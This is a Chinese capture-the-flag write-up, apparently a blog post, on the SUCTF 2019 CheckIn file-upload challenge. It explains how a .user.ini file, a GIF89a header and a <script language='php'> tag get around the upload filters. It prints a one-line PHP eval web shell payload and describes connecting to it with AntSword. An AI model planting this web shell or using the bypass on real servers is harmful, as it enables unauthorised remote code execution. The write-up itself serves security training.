练[SUCTF 2019]CheckIn

[SUCTF 2019]CheckIn


在这里插入图片描述

掌握知识

.user.ini文件上传利用–需要上传目录有一个php文件(index.php),文件头绕过,文件内容<?检测

解题思路

  1. 打开题目链接,发现又是一个上传文件题目,继续上传改后缀的一句话木马,然后抓包,修改php后缀发现返回非法后缀名,尝试phtml.php3.php6...都没成功,看来是白名单了。

image-20231003161925703

  1. 只好尝试上传一下jpg文件查看一下其他过滤和上传目录,发现还存在文件头检测和对文件内容<?的检测。文件头添加GIF89a?即可绕过,<?的检测可以继续使用js代码执行php代码的方式

image-20231003162115358

image-20231003162107404

  1. 上传正常格式的jpg文件后,发现回显了上传目录和目录结构发现了index.php文件。那看来是使用.user.ini文件了,该文件能够实现文件包含内容,前提就是上传的目录下有一个php文件,这样使用.user.ini包含的文件就可以执行文件内的php代码了

image-20231003162208536

  1. 利用方法已经明白,接着就上传.user.inishell.jpg文件即可,绕过文件头和文件内容即可成功上传

image-20231003162351494

image-20231003162456296

  1. 现在目录下存在.user,ini配置文件,index.phpphp文件,和含有恶意代码的jpg文件,只需要访问该php文件即可自动包含jpg文件执行其中的恶意代码,所以蚁剑连接的地址也是该php文件。直接蚁剑连接,在根目录下拿下flag

image-20231003162717873

image-20231003162723164

image-20231003162728296

关键paylaod

<script language="php">eval($_POST['a']);</script>

GIF89a?
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值